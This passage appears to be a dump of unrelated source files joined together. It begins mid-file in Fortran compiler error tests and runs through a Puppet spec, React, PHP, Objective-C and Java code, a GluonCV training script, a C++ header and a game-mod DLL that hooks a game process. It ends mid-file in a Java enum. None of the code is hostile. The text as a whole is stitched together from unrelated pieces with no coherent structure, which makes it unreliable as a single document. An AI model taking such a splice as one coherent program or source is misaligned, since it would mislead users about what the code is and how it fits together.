type, extends(t1) :: t2
end type
end
module m5
type :: t1
integer :: t2
end type
type, extends(t1) :: t2
end type
!ERROR: Type cannot be extended as it has a component named 't2'
type, extends(t2) :: t3
end type
end
module m6
! t1 can be extended if it is known as anything but t3
type :: t1
integer :: t3
end type
type, extends(t1) :: t2
end type
end
subroutine s6
use :: m6, only: t3 => t1
!ERROR: Type cannot be extended as it has a component named 't3'
type, extends(t3) :: t4
end type
end
subroutine r6
use :: m6, only: t5 => t1
type, extends(t5) :: t6
end type
end
module m7
type, private :: t1
integer :: i1
end type
type, extends(t1) :: t2
integer :: i2
integer, private :: i3
end type
end
subroutine s7
use m7
type(t2) :: x
integer :: j
j = x%i2
!ERROR: PRIVATE component 'i3' is only accessible within module 'm7'
j = x%i3
!ERROR: PRIVATE component 't1' is only accessible within module 'm7'
j = x%t1%i1
end
! 7.5.4.8(2)
module m8
type :: t
integer :: i1
integer, private :: i2
end type
type(t) :: y
integer :: a(1)
contains
subroutine s0
type(t) :: x
x = t(i1=2, i2=5) !OK
end
subroutine s1
a = [y%i2] !OK
end subroutine
end
subroutine s8
use m8
type(t) :: x
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(2, 5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(i1=2, i2=5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
a = [y%i2]
end
! 7.5.4.8(2)
module m9
interface
module subroutine s()
end subroutine
end interface
type :: t
integer :: i1
integer, private :: i2
end type
end
submodule(m9) sm8
contains
module subroutine s
type(t) :: x
x = t(i1=2, i2=5) !OK
end
end
require 'puppet'
require 'tempfile'
describe Puppet::Type.type(:file_line) do
let :file_line do
Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'line', :path => '/tmp/path')
end
it 'should accept a line and path' do
file_line[:line] = 'my_line'
file_line[:line].should == 'my_line'
file_line[:path] = '/my/path'
file_line[:path].should == '/my/path'
end
it 'should accept a match regex' do
file_line[:match] = '^foo.*$'
file_line[:match].should == '^foo.*$'
end
it 'should not accept a match regex that does not match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^bar=blah$'
)}.to raise_error(Puppet::Error, /the value must be a regex that matches/)
end
it 'should accept a match regex that does match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^\s*foo=.*$'
)}.not_to raise_error
end
it 'should accept posix filenames' do
file_line[:path] = '/tmp/path'
file_line[:path].should == '/tmp/path'
end
it 'should not accept unqualified path' do
expect { file_line[:path] = 'file' }.should raise_error(Puppet::Error, /File paths must be fully qualified/)
end
it 'should require that a line is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :path => '/tmp/file') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should require that a file is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'path') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should default to ensure => present' do
file_line[:ensure].should eq :present
end
it "should autorequire the file it manages" do
catalog = Puppet::Resource::Catalog.new
file = Puppet::Type.type(:file).new(:name => "/tmp/path")
catalog.add_resource file
catalog.add_resource file_line
relationship = file_line.autorequire.find do |rel|
(rel.source.to_s == "File[/tmp/path]") and (rel.target.to_s == file_line.to_s)
end
relationship.should be_a Puppet::Relationship
end
it "should not autorequire the file it manages if it is not managed" do
catalog = Puppet::Resource::Catalog.new
catalog.add_resource file_line
file_line.autorequire.should be_empty
end
end
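The "match regex must match the specified line" behavior exercised by the spec above can be sketched as a standalone check. This is a hypothetical re-creation for illustration, not the actual `file_line` type's validation code:

```ruby
# Hypothetical sketch of the validation the spec above exercises:
# a `match` pattern is only legal if it matches the managed `line`.
def validate_match(line, match)
  unless Regexp.new(match).match?(line)
    raise ArgumentError, 'the value must be a regex that matches the line'
  end
  true
end

puts validate_match('foo=bar', '^\s*foo=.*$')  # true
```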
import { createElement as h } from 'react'
import { AppRegistry } from 'react-native'
import { BrowserRouter } from 'react-router-dom'
import { APP_ID, DATA_KEY } from '@roguejs/app/constants'
import App from './App'
AppRegistry.registerComponent('App', () => {
return props => h(BrowserRouter, {}, h(App, props))
})
AppRegistry.runApplication('App', {
  initialProps: typeof window !== 'undefined' ? window[DATA_KEY] : {},
rootTag: document.getElementById(APP_ID),
})
// https://github.com/alidcastano/rogue.js/issues/78
// import hydrate from'@roguejs/app/client.native'
// import App from './App'
// hydrate(App)
if (module.hot) {
module.hot.accept()
}
org.apache.commons.math3.distribution.HypergeometricDistribution
<?php
class HTMLPurifier_AttrDef_TextTest extends HTMLPurifier_AttrDefHarness
{
public function test()
{
$this->def = new HTMLPurifier_AttrDef_Text();
$this->assertDef('This is spiffy text!');
$this->assertDef(" Casual\tCDATA parse\ncheck. ", 'Casual CDATA parse check.');
}
}
// vim: et sw=4 sts=4
//
// UIControl+ActionBlocks.m
// iOS-Categories (https://github.com/shaojiankui/iOS-Categories)
//
// Created by Jakey on 15/5/23.
// Copyright (c) 2015年 www.skyfox.org. All rights reserved.
//
#import "UIControl+ActionBlocks.h"
#import <objc/runtime.h>
static const void *UIControlActionBlockArray = &UIControlActionBlockArray;
@implementation UIControlActionBlockWrapper
- (void)invokeBlock:(id)sender {
if (self.actionBlock) {
self.actionBlock(sender);
}
}
@end
@implementation UIControl (ActionBlocks)
-(void)handleControlEvents:(UIControlEvents)controlEvents withBlock:(UIControlActionBlock)actionBlock {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
UIControlActionBlockWrapper *blockActionWrapper = [[UIControlActionBlockWrapper alloc] init];
blockActionWrapper.actionBlock = actionBlock;
blockActionWrapper.controlEvents = controlEvents;
[actionBlocksArray addObject:blockActionWrapper];
[self addTarget:blockActionWrapper action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
- (void)removeActionBlocksForControlEvents:(UIControlEvents)controlEvents {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
NSMutableArray *wrappersToRemove = [NSMutableArray arrayWithCapacity:[actionBlocksArray count]];
[actionBlocksArray enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
UIControlActionBlockWrapper *wrapperTmp = obj;
if (wrapperTmp.controlEvents == controlEvents) {
[wrappersToRemove addObject:wrapperTmp];
[self removeTarget:wrapperTmp action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
}];
[actionBlocksArray removeObjectsInArray:wrappersToRemove];
}
- (NSMutableArray *)actionBlocksArray {
NSMutableArray *actionBlocksArray = objc_getAssociatedObject(self, UIControlActionBlockArray);
if (!actionBlocksArray) {
actionBlocksArray = [NSMutableArray array];
objc_setAssociatedObject(self, UIControlActionBlockArray, actionBlocksArray, OBJC_ASSOCIATION_RETAIN);
}
return actionBlocksArray;
}
@end
/*
* <<
* Davinci
* ==
* Copyright (C) 2016 - 2019 EDP
* ==
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* >>
*
*/
package edp.davinci.service;
import edp.core.exception.NotFoundException;
import edp.core.exception.ServerException;
import edp.core.exception.UnAuthorizedExecption;
import edp.davinci.core.service.CheckEntityService;
import edp.davinci.dto.displayDto.*;
import edp.davinci.dto.roleDto.VizVisibility;
import edp.davinci.model.DisplaySlide;
import edp.davinci.model.MemDisplaySlideWidget;
import edp.davinci.model.Role;
import edp.davinci.model.User;
import org.springframework.web.multipart.MultipartFile;
import java.util.List;
public interface DisplaySlideService extends CheckEntityService {
DisplayWithSlides getDisplaySlideList(Long displayId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
SlideWithMem getDisplaySlideMem(Long displayId, Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
DisplaySlide createDisplaySlide(DisplaySlideCreate displaySlideCreate, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateDisplaySildes(Long displayId, DisplaySlide[] displaySlides, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlide(Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<MemDisplaySlideWidget> addMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetCreate[] slideWidgetCreates, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidget(MemDisplaySlideWidget memDisplaySlideWidget, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteMemDisplaySlideWidget(Long relationId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlideWidgetList(Long displayId, Long slideId, Long[] memIds, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetDto[] memDisplaySlideWidgets, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideBGImage(Long slideId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideSubWidgetBGImage(Long relationId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<Long> getSlideExecludeRoles(Long id);
boolean postSlideVisibility(Role role, VizVisibility vizVisibility, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean copySlides(Long originDisplayId, Long displayId, User user);
}
import mxnet as mx
import numpy as np
import os, time, logging, argparse, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
import gluoncv as gcv
gcv.utils.check_version('0.6.0')
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
def parse_opts():
parser = argparse.ArgumentParser(description='Transfer learning on MINC-2500 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data', type=str, default='',
help='directory for the prepared data folder')
parser.add_argument('--model', required=True, type=str,
help='name of the pretrained model from model zoo.')
parser.add_argument('-j', '--workers', dest='num_workers', default=4, type=int,
help='number of preprocessing workers')
parser.add_argument('--num-gpus', default=0, type=int,
help='number of gpus to use, 0 indicates cpu only')
parser.add_argument('--epochs', default=40, type=int,
help='number of training epochs')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.001, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float,
help='momentum')
parser.add_argument('--weight-decay', '--wd', dest='wd', default=1e-4, type=float,
help='weight decay (default: 1e-4)')
parser.add_argument('--lr-factor', default=0.75, type=float,
help='learning rate decay ratio')
parser.add_argument('--lr-steps', default='10,20,30', type=str,
help='list of learning rate decay epochs as in str')
opts = parser.parse_args()
return opts
# Preparation
opts = parse_opts()
classes = 23
model_name = opts.model
epochs = opts.epochs
lr = opts.lr
batch_size = opts.batch_size
momentum = opts.momentum
wd = opts.wd
lr_factor = opts.lr_factor
lr_steps = [int(s) for s in opts.lr_steps.split(',')] + [np.inf]
num_gpus = opts.num_gpus
num_workers = opts.num_workers
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = batch_size * max(num_gpus, 1)
logging.basicConfig(level=logging.INFO,
handlers = [logging.StreamHandler()])
train_path = os.path.join(opts.data, 'train')
val_path = os.path.join(opts.data, 'val')
test_path = os.path.join(opts.data, 'test')
jitter_param = 0.4
lighting_param = 0.1
normalize = transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(480),
transforms.RandomResizedCrop(224),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
transforms.RandomLighting(lighting_param),
transforms.ToTensor(),
normalize
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
def test(net, val_data, ctx):
metric = mx.metric.Accuracy()
for i, batch in enumerate(val_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
outputs = [net(X) for X in data]
metric.update(label, outputs)
return metric.get()
def train(train_path, val_path, test_path):
# Initialize the net with pretrained model
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
finetune_net.output = nn.Dense(classes)
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
# Define DataLoader
train_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(train_path).transform_first(transform_train),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(val_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(test_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
# Define Trainer
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
lr_counter = 0
num_batch = len(train_data)
# Start Training
for epoch in range(epochs):
if epoch == lr_steps[lr_counter]:
trainer.set_learning_rate(trainer.learning_rate*lr_factor)
lr_counter += 1
tic = time.time()
train_loss = 0
metric.reset()
for i, batch in enumerate(train_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
with ag.record():
outputs = [finetune_net(X) for X in data]
loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
for l in loss:
l.backward()
trainer.step(batch_size)
train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
metric.update(label, outputs)
_, train_acc = metric.get()
train_loss /= num_batch
_, val_acc = test(finetune_net, val_data, ctx)
logging.info('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
(epoch, train_acc, train_loss, val_acc, time.time() - tic))
_, test_acc = test(finetune_net, test_data, ctx)
logging.info('[Finished] Test-acc: %.3f' % (test_acc))
if __name__ == "__main__":
train(train_path, val_path, test_path)
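The step-decay schedule used in train() above (multiply by lr_factor each time the epoch index reaches an entry of lr_steps) is easy to sanity-check in isolation:

```python
def lr_at_epoch(base_lr, lr_factor, lr_steps, epoch):
    """Learning rate in effect at `epoch` under the schedule in
    train(): lr is multiplied by lr_factor once per boundary in
    lr_steps that has already been reached."""
    lr = base_lr
    for step in lr_steps:
        if epoch >= step:
            lr *= lr_factor
    return lr

# Script defaults: --lr 0.001, --lr-factor 0.75, --lr-steps 10,20,30
print(lr_at_epoch(0.001, 0.75, [10, 20, 30], 5))   # 0.001
print(lr_at_epoch(0.001, 0.75, [10, 20, 30], 25))  # 0.001 * 0.75**2
```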
{
"created_at": "2015-02-27T22:27:51.555394",
"description": "Simple 1-room web chat",
"fork": false,
"full_name": "rick446/Chatterbox",
"language": "Python",
"updated_at": "2015-02-27T23:41:55.318953"
}
people = [{first_name = "Bruce", last_name = "Springsteen"},
{first_name = "Eric", last_name = "Clapton"},
{first_name = "Bob", last_name = "Seger"}]
// TR1 cfloat -*- C++ -*-
// Copyright (C) 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 2, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this library; see the file COPYING. If not, write to the Free
// Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
// USA.
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
/** @file tr1/cfloat
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_CFLOAT
#define _TR1_CFLOAT 1
#include <cfloat>
#ifndef DECIMAL_DIG
#define DECIMAL_DIG __DECIMAL_DIG__
#endif
#ifndef FLT_EVAL_METHOD
#define FLT_EVAL_METHOD __FLT_EVAL_METHOD__
#endif
#endif
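What `DECIMAL_DIG` buys you — enough decimal digits to round-trip the widest floating type through text losslessly — can be illustrated with Python floats, which are C doubles. This is a sketch assuming IEEE-754 doubles, for which the double analogue of `DECIMAL_DIG` is 17 (on platforms with a wider `long double`, the actual macro value is larger):

```python
import math

# 17 significant decimal digits always reproduce the exact same double
# after a text round-trip; 15 digits (DBL_DIG) can lose information.
pi_17 = float(f"{math.pi:.17g}")
pi_15 = float(f"{math.pi:.15g}")

assert pi_17 == math.pi   # lossless round-trip at 17 digits
assert pi_15 != math.pi   # 15 digits dropped the low-order bits of pi
```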
| {
"pile_set_name": "Github"
} |
/**
* This file is part of Tales of Zestiria "Fix".
*
* Tales of Zestiria "Fix" is free software : you can redistribute it
* and/or modify it under the terms of the GNU General Public License
* as published by The Free Software Foundation, either version 3 of
* the License, or (at your option) any later version.
*
* Tales of Zestiria "Fix" is distributed in the hope that it will be
* useful,
*
* But WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Tales of Zestiria "Fix".
*
* If not, see <http://www.gnu.org/licenses/>.
*
**/
#include <Windows.h>
#include "config.h"
#include "log.h"
#include "sound.h"
#include "framerate.h"
#include "general_io.h"
#include "keyboard.h"
#include "steam.h"
#include "render.h"
#include "scanner.h"
#include "command.h"
#include "hook.h"
#include <process.h>
#pragma comment (lib, "kernel32.lib")
HMODULE hDLLMod = { 0 }; // Handle to SELF
HMODULE hInjectorDLL = { 0 }; // Handle to Special K
typedef HRESULT (__stdcall *SK_UpdateSoftware_pfn)(const wchar_t* wszProduct);
typedef bool (__stdcall *SK_FetchVersionInfo_pfn)(const wchar_t* wszProduct);
std::wstring injector_dll;
typedef void (__stdcall *SKX_SetPluginName_pfn)(std::wstring name);
SKX_SetPluginName_pfn SKX_SetPluginName = nullptr;
unsigned int
WINAPI
DllThread (LPVOID user)
{
std::wstring plugin_name = L"Tales of Zestiria \"Fix\" v " + TZF_VER_STR;
dll_log = TZF_CreateLog (L"logs/tzfix.log");
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" ); // <--- I was bored ;)
dll_log->Log ( L"tzfix.dll Plug-In\n"
L"=========== (Version: v %s) "
L"===========",
TZF_VER_STR.c_str () );
DWORD speedresetcode_addr = 0x0046C0F9; //0x0046C529;
DWORD speedresetcode2_addr = 0x0056EB41; //0x0056E441; 0x217B464
DWORD speedresetcode3_addr = 0x0056E03E; //0x0056D93F;
DWORD limiter_branch_addr = 0x00990F53; //0x00990873;
DWORD aspect_addr = 0x00D52388; //0x00D52398;
DWORD fovy_addr = 0x00D5238C; //0x00D5239C;
if (! TZF_LoadConfig ()) {
config.audio.channels = 8;
config.audio.sample_hz = 48000;
config.audio.compatibility = false;
config.audio.enable_fix = true;
config.framerate.allow_fake_sleep = false;
config.framerate.yield_processor = true;
config.framerate.minimize_latency = false;
config.framerate.speedresetcode_addr = 0x0046C0F9;
config.framerate.speedresetcode2_addr = 0x0056EB41;
config.framerate.speedresetcode3_addr = 0x0056E03E;
config.framerate.limiter_branch_addr = 0x00990873;
config.framerate.disable_limiter = true;
config.framerate.auto_adjust = false;
config.framerate.target = 60;
config.framerate.battle_target = 60;
config.framerate.battle_adaptive = false;
config.framerate.cutscene_target = 30;
config.file_io.capture = false;
config.steam.allow_broadcasts = false;
config.lua.fix_priest = true;
config.render.aspect_ratio = 1.777778f;
config.render.fovy = 0.785398f;
config.render.aspect_addr = 0x00D56494;
config.render.fovy_addr = 0x00D56498;
config.render.blackbar_videos = true;
config.render.aspect_correction = true;
config.render.postproc_ratio = 1.0f;
config.render.shadow_rescale = -2;
config.render.env_shadow_rescale = 0;
config.render.clear_blackbars = true;
config.textures.remaster = true;
config.textures.dump = false;
config.textures.cache = true;
config.textures.gamepad = L"Xbox360";
config.system.injector = injector_dll;
// Save a new config if none exists
TZF_SaveConfig ();
}
config.system.injector = injector_dll;
SKX_SetPluginName =
(SKX_SetPluginName_pfn)
GetProcAddress (hInjectorDLL, "SKX_SetPluginName");
SK_GetCommandProcessor =
(SK_GetCommandProcessor_pfn)
GetProcAddress (hInjectorDLL, "SK_GetCommandProcessor");
//
// If this is NULL, the injector system isn't working right!!!
//
if (SKX_SetPluginName != nullptr)
SKX_SetPluginName (plugin_name.c_str ());
// Locate the gamestate address; having this as the first thing in the log
// file is tremendously handy in identifying which client version a user
// is running.
{
uint8_t sig [] = { 0x74, 0x42, 0xB1, 0x01, 0x38, 0x1D };
uintptr_t addr = (uintptr_t)TZF_Scan (sig, 6);
if (addr != NULL) {
game_state.base_addr = (BYTE *)(*(DWORD *)(addr + 6) - 0x13);
dll_log->Log (L"[ Sig Scan ] Scanned Gamestate Address: %06Xh", game_state.base_addr);
}
}
if (TZF_Init_MinHook () == MH_OK) {
extern void TZFix_ImGui_Init (void);
TZFix_ImGui_Init ();
CoInitializeEx (nullptr, COINIT_MULTITHREADED);
tzf::SoundFix::Init ();
tzf::FileIO::Init ();
tzf::SteamFix::Init ();
tzf::RenderFix::Init ();
tzf::FrameRateFix::Init ();
tzf::KeyboardFix::Init ();
TZF_ApplyQueuedHooks ();
// Uncomment this when spawning a thread
//CoUninitialize ();
}
SK_UpdateSoftware_pfn SK_UpdateSoftware =
(SK_UpdateSoftware_pfn)
GetProcAddress ( hInjectorDLL,
"SK_UpdateSoftware" );
SK_FetchVersionInfo_pfn SK_FetchVersionInfo =
(SK_FetchVersionInfo_pfn)
GetProcAddress ( hInjectorDLL,
"SK_FetchVersionInfo" );
if (! wcsstr (injector_dll.c_str (), L"SpecialK")) {
if ( SK_FetchVersionInfo != nullptr &&
SK_UpdateSoftware != nullptr ) {
if (SK_FetchVersionInfo (L"TZF")) {
SK_UpdateSoftware (L"TZF");
}
}
}
return 0;
}
__declspec (dllexport)
BOOL
WINAPI
SKPlugIn_Init (HMODULE hModSpecialK)
{
wchar_t wszSKFileName [ MAX_PATH + 2] = { L'\0' };
wszSKFileName [ MAX_PATH ] = L'\0';
GetModuleFileName (hModSpecialK, wszSKFileName, MAX_PATH - 1);
injector_dll = wszSKFileName;
hInjectorDLL = hModSpecialK;
#if 1
DllThread (nullptr);
#else
_beginthreadex ( nullptr, 0, DllThread, nullptr, 0x00, nullptr );
#endif
return TRUE;
}
__declspec (dllexport)
BOOL
WINAPI
SKPlugIn_Shutdown (LPVOID* lpReserved)
{
UNREFERENCED_PARAMETER (lpReserved);
if (dll_log != nullptr) {
tzf::SoundFix::Shutdown ();
tzf::FileIO::Shutdown ();
tzf::SteamFix::Shutdown ();
tzf::RenderFix::Shutdown ();
tzf::FrameRateFix::Shutdown ();
tzf::KeyboardFix::Shutdown ();
TZF_SaveConfig ();
TZF_UnInit_MinHook ();
dll_log->LogEx ( false, L"=========== (Version: v %s) "
L"===========\n",
TZF_VER_STR.c_str () );
dll_log->LogEx ( true, L"End TZFix Plug-In\n" );
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" );
dll_log->close ();
}
return TRUE;
}
BOOL
APIENTRY
DllMain (HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID /* lpReserved */)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
hDLLMod = hModule;
} break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
{
} break;
}
return TRUE;
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013-2018 yvolk (Yuri Volkov), http://yurivolkov.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.andstatus.app.timeline.meta;
import android.content.Context;
import androidx.annotation.NonNull;
import androidx.annotation.StringRes;
import org.andstatus.app.R;
import org.andstatus.app.lang.SelectableEnum;
import org.andstatus.app.net.social.ApiRoutineEnum;
import org.andstatus.app.notification.NotificationEventType;
import org.andstatus.app.timeline.ListScope;
import org.andstatus.app.util.StringUtil;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.andstatus.app.net.social.ApiRoutineEnum.ACTOR_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.DUMMY_API;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FOLLOWERS;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FRIENDS;
import static org.andstatus.app.net.social.ApiRoutineEnum.HOME_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.LIKED_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.NOTIFICATIONS_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.PRIVATE_NOTES;
import static org.andstatus.app.net.social.ApiRoutineEnum.PUBLIC_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.SEARCH_NOTES;
public enum TimelineType implements SelectableEnum {
UNKNOWN(ListScope.ORIGIN, "unknown", R.string.timeline_title_unknown, 0, DUMMY_API),
/** The Home timeline and other information (replies...). */
HOME(ListScope.USER, "home", R.string.timeline_title_home, 0, HOME_TIMELINE),
UNREAD_NOTIFICATIONS(ListScope.USER, "unread_notifications", R.string.unread_notifications, 0, NOTIFICATIONS_TIMELINE),
/** The Mentions timeline and other information (replies...). */
INTERACTIONS(ListScope.USER, "interactions", R.string.timeline_title_interactions, 0, NOTIFICATIONS_TIMELINE),
FAVORITES(ListScope.USER, "favorites", R.string.timeline_title_favorites, 0, LIKED_TIMELINE),
/** Notes by the selected Actor (where he is an Author, or an Actor only, e.g. for Reblog/Retweet).
* This Actor is not necessarily one of our Accounts */
SENT(ListScope.USER, "sent", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
SENT_AT_ORIGIN(ListScope.ACTOR_AT_ORIGIN, "sent_at_origin", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
/** Latest notes of every Friend of this Actor
* (i.e of every actor, followed by this Actor).
* So this is essentially a list of "Friends". See {@link org.andstatus.app.database.table.GroupMembersTable} */
FRIENDS(ListScope.USER, "friends", R.string.friends, R.string.friends_of, GET_FRIENDS),
FOLLOWERS(ListScope.USER, "followers", R.string.followers, R.string.followers_of, GET_FOLLOWERS),
GROUP(ListScope.USER, "group", R.string.group, R.string.group_notes, DUMMY_API),
PUBLIC(ListScope.ORIGIN, "public", R.string.timeline_title_public, 0, PUBLIC_TIMELINE),
EVERYTHING(ListScope.ORIGIN, "everything", R.string.timeline_title_everything, 0, DUMMY_API),
SEARCH(ListScope.ORIGIN, "search", R.string.options_menu_search, 0, SEARCH_NOTES),
PRIVATE(ListScope.USER, "private", R.string.timeline_title_private, 0, PRIVATE_NOTES),
NOTIFICATIONS(ListScope.USER, "notifications", R.string.notifications_title, 0, NOTIFICATIONS_TIMELINE),
DRAFTS(ListScope.USER, "drafts", R.string.timeline_title_drafts, 0, DUMMY_API),
OUTBOX(ListScope.USER, "outbox", R.string.timeline_title_outbox, 0, DUMMY_API),
ACTORS(ListScope.ORIGIN, "users", R.string.user_list, 0, DUMMY_API),
CONVERSATION(ListScope.ORIGIN, "conversation", R.string.label_conversation, 0, DUMMY_API),
COMMANDS_QUEUE(ListScope.ORIGIN, "commands_queue", R.string.commands_in_a_queue, 0, DUMMY_API),
MANAGE_TIMELINES(ListScope.ORIGIN, "manages_timelines", R.string.manage_timelines, 0, DUMMY_API);
/** Code - identifier of the type */
private final String code;
@StringRes
private final int titleResId;
@StringRes
public final int titleResWithParamsId;
/** Api routine to download this timeline */
private final ApiRoutineEnum connectionApiRoutine;
public final ListScope scope;
TimelineType(ListScope scope, String code, @StringRes int resId, @StringRes int resWithParamsId,
ApiRoutineEnum connectionApiRoutine) {
this.scope = scope;
this.code = code;
this.titleResId = resId;
this.titleResWithParamsId = resWithParamsId;
this.connectionApiRoutine = connectionApiRoutine;
}
/** Returns the enum or UNKNOWN */
@NonNull
public static TimelineType load(String strCode) {
for (TimelineType value : TimelineType.values()) {
if (value.code.equals(strCode)) {
return value;
}
}
return UNKNOWN;
}
public static List<TimelineType> getDefaultMyAccountTimelineTypes() {
return defaultMyAccountTimelineTypes;
}
public static Set<TimelineType> getDefaultOriginTimelineTypes() {
return defaultOriginTimelineTypes;
}
@NonNull
public static TimelineType from(NotificationEventType event) {
switch (event) {
case OUTBOX:
return OUTBOX;
default:
return UNREAD_NOTIFICATIONS;
}
}
/** String to be used for persistence */
public String save() {
return code;
}
@Override
public String toString() {
return "timelineType:" + code;
}
@Override
public String getCode() {
